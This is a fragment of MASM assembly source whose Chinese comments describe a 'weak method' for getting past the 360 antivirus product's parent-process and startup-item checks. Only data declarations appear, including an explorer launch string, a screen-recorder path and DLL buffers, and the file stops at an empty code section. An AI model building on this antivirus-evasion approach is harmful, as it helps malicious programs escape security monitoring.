;落笔飞花笑百生
;2014.12.9
;过360父进程一个弱弱的方法
;过360启动项
.386
.model flat,stdcall
option casemap:none
include windows.inc
includelib kernel32.lib
include kernel32.inc
include user32.inc
includelib user32.lib
include C:\Users\巫师\Desktop\RadASM\masm32\macros\Strings.mac
dll equ 105
.const
.data
windowname byte 100 dup (?)
tests byte "C:\Program Files\tlxsoft\屏幕录像专家 共享版 V2014\屏录专家.exe",0
version OSVERSIONINFOEX<?>
explorerpatch byte "explorer /e, /select, "
exepatch byte "C:\Program Files\tlxsoft\屏幕录像专家 共享版 V2014\屏录专家.exe",0
;exepatch byte 260 dup(?)
dllpatch byte 260 dup (?)
dllname byte "/xx.dll",0
dllpoiter dd 00
dllsize dd 00
filehandle dd 00
filewriteold dd 00
.code